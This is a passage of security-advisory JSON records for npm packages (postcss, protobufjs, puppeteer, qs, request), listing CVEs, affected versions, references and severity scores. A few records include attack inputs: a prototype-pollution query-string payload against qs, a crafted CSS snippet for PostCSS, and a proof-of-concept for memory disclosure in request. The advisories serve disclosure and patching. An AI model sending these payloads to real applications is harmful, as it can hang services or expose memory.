"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-566m-qj78-rww5/GHSA-566m-qj78-rww5.json" } }, { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.0.36" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-566m-qj78-rww5/GHSA-566m-qj78-rww5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23382" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/releases/tag/7.0.36" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640" 
} ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-20T21:23:19Z", "nvd_published_at": "2021-04-26T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7fh5-64p2-3v2j", "published": "2023-09-30T00:31:10Z", "modified": "2025-11-04T16:45:01Z", "aliases": [ "CVE-2023-44270" ], "summary": "PostCSS line return parsing error", "details": "An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\\r` discrepancies, as demonstrated by `@font-face{ font:(\\r/*);}` in a rule.\n\nThis vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.", "affected": [ { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "8.4.31" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-7fh5-64p2-3v2j/GHSA-7fh5-64p2-3v2j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44270" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/2820" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5" }, { "type": "PACKAGE", "url": "https://github.com/postcss/postcss" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/releases/tag/8.4.31" }, { 
"type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html" } ], "database_specific": { "cwe_ids": [ "CWE-144", "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2023-10-03T15:04:58Z", "nvd_published_at": "2023-09-29T22:15:11Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hwj9-h5mp-3pm3", "published": "2021-05-10T15:29:24Z", "modified": "2025-01-14T08:57:30.487716Z", "aliases": [ "CVE-2021-23368" ], "summary": "Regular Expression Denial of Service in postcss", "details": "The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.", "affected": [ { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.36" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-hwj9-h5mp-3pm3/GHSA-hwj9-h5mp-3pm3.json" } }, { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.2.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-hwj9-h5mp-3pm3/GHSA-hwj9-h5mp-3pm3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23368" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-07T17:26:38Z", "nvd_published_at": "2021-04-12T14:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-762f-c2wg-m8c8", "published": "2018-10-09T00:27:15Z", "modified": "2023-11-08T04:00:18.161439Z", "aliases": [ "CVE-2018-3738" ], "summary": "Denial of Service in protobufjs", "details": "Versions of `protobufjs` before 5.0.3 and 6.8.6 are vulnerable to a regular expression denial of service when parsing crafted invalid *.proto files.\n\n\n## Recommendation\n\nUpdate to version 5.0.3, 6.8.6 or later.", "affected": [ { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.8.6" } ] } ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-762f-c2wg-m8c8/GHSA-762f-c2wg-m8c8.json" } }, { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-762f-c2wg-m8c8/GHSA-762f-c2wg-m8c8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3738" }, { "type": "WEB", "url": "https://hackerone.com/reports/319576" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-762f-c2wg-m8c8" }, { "type": "WEB", "url": "https://github.com/dcodeIO/protobuf.js/blob/6.8.5/src/parse.js#L27" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/605" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:21:32Z", "nvd_published_at": "2018-06-07T02:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g954-5hwp-pp24", "published": "2022-05-28T00:00:20Z", "modified": "2025-01-14T10:57:13.409784Z", "aliases": [ "CVE-2022-25878" ], "summary": "Prototype Pollution in protobufjs", "details": "The package protobufjs is vulnerable to Prototype Pollution, which can allow an attacker to add/modify properties of the Object.prototype. Versions after and including 6.10.0 until 6.10.3 and after and including 6.11.0 until 6.11.3 are vulnerable.\n\nThis vulnerability can occur in multiple ways:\n1. by providing untrusted user input to util.setProperty or to ReflectionObject.setParsedOption functions\n2. 
by parsing/loading .proto files\n\n\n", "affected": [ { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.11.0" }, { "fixed": "6.11.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-g954-5hwp-pp24/GHSA-g954-5hwp-pp24.json" } }, { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.10.0" }, { "fixed": "6.10.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-g954-5hwp-pp24/GHSA-g954-5hwp-pp24.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25878" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/pull/1731" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/pull/1735" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/commit/b5f1391dff5515894830a6570e6d73f5511b2e8f" }, { "type": "PACKAGE", "url": "https://github.com/protobufjs/protobuf.js" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/blob/d13d5d5688052e366aa2e9169f50dfca376b32cf/src/util.js%23L176-L197" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2841507" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PROTOBUFJS-2441248" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-06-02T20:36:05Z", "nvd_published_at": "2022-05-27T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h755-8qp9-cq85", "published": "2023-07-05T15:30:24Z", "modified": "2024-06-28T18:31:41Z", "aliases": [ "CVE-2023-36665" ], "related": 
[ "CGA-9c79-2q9x-78w6" ], "summary": "protobufjs Prototype Pollution vulnerability", "details": "protobuf.js (aka protobufjs) 6.10.0 until 6.11.4 and 7.0.0 until 7.2.4 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty. NOTE: this CVE Record is about `Object.constructor.prototype.\u003cnew-property\u003e = ...;` whereas CVE-2022-25878 was about `Object.__proto__.\u003cnew-property\u003e = ...;` instead.", "affected": [ { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.2.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-h755-8qp9-cq85/GHSA-h755-8qp9-cq85.json" } }, { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.10.0" }, { "fixed": "6.11.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-h755-8qp9-cq85/GHSA-h755-8qp9-cq85.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36665" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/issues/1918#issuecomment-1723500294" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/pull/1899" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/commit/e66379f451b0393c27d87b37fa7d271619e16b0d" }, { 
"type": "PACKAGE", "url": "https://github.com/protobufjs/protobuf.js" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/commits/release-6.11.4" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.2.3...protobufjs-v7.2.4" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.2.4" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240628-0006" }, { "type": "WEB", "url": "https://www.code-intelligence.com/blog/cve-protobufjs-prototype-pollution-cve-2023-36665" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2023-07-07T20:19:02Z", "nvd_published_at": "2023-07-05T14:15:09Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c2gp-86p4-5935", "published": "2020-09-02T18:25:43Z", "modified": "2023-11-08T04:01:37.201603Z", "aliases": [ "CVE-2019-5786" ], "summary": "Use-After-Free in puppeteer", "details": "Versions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). 
The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.\n\n\n## Recommendation\n\nUpgrade to version 1.13.0 or later.", "affected": [ { "package": { "name": "puppeteer", "ecosystem": "npm", "purl": "pkg:npm/puppeteer" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.13.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-c2gp-86p4-5935/GHSA-c2gp-86p4-5935.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5786" }, { "type": "WEB", "url": "https://github.com/GoogleChrome/puppeteer/issues/4141" }, { "type": "WEB", "url": "https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation" }, { "type": "WEB", "url": "https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html" }, { "type": "WEB", "url": "https://crbug.com/936448" }, { "type": "PACKAGE", "url": "https://github.com/GoogleChrome/puppeteer" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PUPPETEER-174321" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/824" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:37:09Z", "nvd_published_at": "2019-06-27T17:15:13Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f9cm-p3w6-xvr3", "published": "2018-10-09T00:38:48Z", "modified": "2023-11-08T03:57:33.533771Z", "aliases": [ "CVE-2014-10064" ], "summary": "Denial-of-Service Extended Event Loop Blocking in qs", "details": "Versions prior to 1.0.0 of `qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string.\n\n\n\n\n## Recommendation\n\nUpdate to version 1.0.0 or later", "affected": [ { 
"package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-f9cm-p3w6-xvr3/GHSA-f9cm-p3w6-xvr3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-10064" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-f9cm-p3w6-xvr3" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/28" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:11Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-gqgv-6jq5-jjj9", "published": "2020-04-30T17:16:47Z", "modified": "2023-11-08T03:58:42.086259Z", "aliases": [ "CVE-2017-1000048" ], "summary": "Prototype Pollution Protection Bypass in qs", "details": "Affected versions of `qs` are vulnerable to Prototype Pollution because it is possible to bypass the protection. The `qs.parse` function fails to properly prevent an object's prototype from being altered when parsing arbitrary input. Input containing `[` or `]` may bypass the prototype pollution protection and alter the Object prototype. 
This allows attackers to override properties that will exist in all objects, which may lead to Denial of Service or Remote Code Execution in specific circumstances.\n\n\n## Recommendation\n\nUpgrade to 6.0.4, 6.1.2, 6.2.3, 6.3.2 or later.", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.0.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.1.0" }, { "fixed": "6.1.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.2.0" }, { "fixed": "6.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.3.0" }, { "fixed": "6.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000048" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/issues/200" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/beade029171b8cef9cee0d03ebe577e2dd84976d" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2672" }, { "type": 
"PACKAGE", "url": "https://github.com/ljharb/qs" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:qs:20170213" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1469" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-04-30T17:16:10Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hrpp-h998-j3pp", "published": "2022-11-27T00:30:50Z", "modified": "2025-04-29T15:41:43Z", "aliases": [ "CVE-2022-24999" ], "summary": "qs vulnerable to Prototype Pollution", "details": "qs before 6.10.3 allows attackers to cause a Node process hang because an `__ proto__` key can be used. In many typical web framework use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as `a[__proto__]=b\u0026a[__proto__]\u0026a[length]=100000000`. 
The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4.", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.10.0" }, { "fixed": "6.10.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.9.0" }, { "fixed": "6.9.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.8.0" }, { "fixed": "6.8.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.7.0" }, { "fixed": "6.7.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.6.0" }, { "fixed": "6.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.5.0" }, { "fixed": "6.5.3" 
} ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.4.0" }, { "fixed": "6.4.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.3.0" }, { "fixed": "6.3.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24999" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/pull/428" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/4310742efbd8c03f6495f07906b45213da0a32ec" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/727ef5d34605108acb3513f72d5435972ed15b68" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/73205259936317b40f447c5cdb71c5b341848e1b" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/8b4cc14cda94a5c89341b77e5fe435ec6c41be2d" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/ba24e74dd17931f825adb52f5633e48293b584e1" }, { "type": "WEB", "url": 
"https://github.com/ljharb/qs/commit/e799ba57e573a30c14b67c1889c7c04d508b9105" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/ed0f5dcbef4b168a8ae299d78b1e4a2e9b1baf1f" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/f945393cfe442fe8c6e62b4156fd35452c0686ee" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/fc3682776670524a42e19709ec4a8138d0d7afda" }, { "type": "WEB", "url": "https://github.com/expressjs/express/releases/tag/4.17.3" }, { "type": "PACKAGE", "url": "https://github.com/ljharb/qs" }, { "type": "WEB", "url": "https://github.com/n8tz/CVE-2022-24999" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00039.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230908-0005" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-12-06T14:32:46Z", "nvd_published_at": "2022-11-26T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jjv7-qpx3-h62q", "published": "2017-10-24T18:33:36Z", "modified": "2023-11-08T03:57:44.492821Z", "aliases": [ "CVE-2014-7191" ], "summary": "Denial-of-Service Memory Exhaustion in qs", "details": "Versions prior to 1.0 of `qs` are affected by a denial of service condition. 
This condition is triggered by parsing a crafted string that deserializes into very large sparse arrays, resulting in the process running out of memory and eventually crashing.\n\n\n## Recommendation\n\nUpdate to version 1.0.0 or later.", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-jjv7-qpx3-h62q/GHSA-jjv7-qpx3-h62q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7191" }, { "type": "WEB", "url": "https://github.com/visionmedia/node-querystring/issues/104" }, { "type": "WEB", "url": "https://github.com/raymondfeng/node-querystring/commit/43a604b7847e56bba49d0ce3e222fe89569354d8" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:1380" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96729" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-jjv7-qpx3-h62q" }, { "type": "PACKAGE", "url": "https://github.com/visionmedia/node-querystring" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/29" }, { "type": "WEB", "url": "http://secunia.com/advisories/60026" }, { "type": "WEB", "url": "http://secunia.com/advisories/62170" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685987" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687263" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687928" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:43:41Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-7xfp-9c55-5vqj", "published": "2018-11-09T17:44:01Z", "modified": 
"2023-11-08T03:59:00.437371Z", "aliases": [ "CVE-2017-16026" ], "summary": "Remote Memory Exposure in request", "details": "Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.\n\n## Proof of Concept\n\n```js\nvar request = require('request');\nvar http = require('http');\n\nvar serveFunction = function (req, res){\n\treq.on('data', function (data) {\n console.log(data)\n });\n\tres.end();\n};\nvar server = http.createServer(serveFunction);\nserver.listen(8000);\n\nrequest({\n\tmethod: \"POST\",\n\turi: 'http://localhost:8000',\n\tmultipart: [{body:500}]\n},function(err,res,body){});\n```\n\n\n## Recommendation\n\nUpdate to version 2.68.0 or later", "affected": [ { "package": { "name": "request", "ecosystem": "npm", "purl": "pkg:npm/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.49.0" }, { "fixed": "2.68.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-7xfp-9c55-5vqj/GHSA-7xfp-9c55-5vqj.json" } }, { "package": { "name": "request", "ecosystem": "npm", "purl": "pkg:npm/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.2.6" }, { "fixed": "2.68.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 2.47.0", "source": 